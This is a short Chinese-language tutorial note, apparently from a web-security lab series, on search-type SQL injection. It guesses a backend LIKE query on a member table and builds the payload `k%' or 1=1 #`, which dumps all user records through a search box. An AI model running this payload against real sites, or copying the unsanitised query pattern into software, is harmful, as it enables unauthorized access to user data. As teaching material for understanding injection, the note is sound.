3.SQL注入-搜索型

SQL注入-搜索型

输入k字段进行搜索发现出用户信息

通过上图搜索可以猜测的sql语句为

select 字段1,字段2 from 表名 where username like '%k%';

在后台查询结果

select id,email from member where username like '%k%';

通过以上猜测进行构造payload语句

like '%k%' or 1=1 #%';
下面的payload语句构造完毕
k%' or 1=1 #

将payload输入搜索框会发现所有用户信息已出现

后台代理逻辑，通过前端传入参数